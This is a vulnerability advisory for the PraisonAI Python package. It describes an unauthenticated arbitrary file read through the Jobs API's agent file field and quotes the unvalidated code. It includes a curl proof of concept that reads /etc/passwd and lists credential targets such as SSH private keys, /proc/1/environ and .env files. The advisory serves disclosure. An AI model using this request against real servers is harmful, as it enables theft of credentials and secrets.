PT-2026-53143 · Pypi · Praisonai
Published
2026-06-18
·
Updated
2026-06-18
CVSS v3.1
7.5
High
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
Summary
An unauthenticated attacker can read arbitrary files on the server by supplying an absolute filesystem path in the
agent file field of the Jobs API. The field has no path validation, no allowlist, and no authentication is required to submit jobs.Details
The
agent file field in JobSubmitRequest accepts any filesystem path with no validation:python
# src/praisonai/praisonai/jobs/models.py:29
agent file: Optional[str] = Field(None, description="Path to agents.yaml file")
# NO path validator, NO allowlistThe executor reads the file directly:
python
# src/praisonai/praisonai/jobs/executor.py:221
agent file = job.agent file or "agents.yaml"
# passed directly to yaml.safe load(open(agent file))Proof of Concept
bash
curl -X POST http://:8005/api/v1/runs
-H "Content-Type: application/json"
-d '{"prompt": "run", "agent file": "/etc/passwd"}'Server responds with contents of
/etc/passwd.Other exploitable paths:
/proc/1/environ— environment variables, API keys/home//.ssh/id rsa— SSH private keys/app/.env— application secrets
Impact
Any unauthenticated attacker with network access to port 8005 can read any file accessible to the server process, including credentials, private keys, and environment variables.
Fix
Path traversal
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Praisonai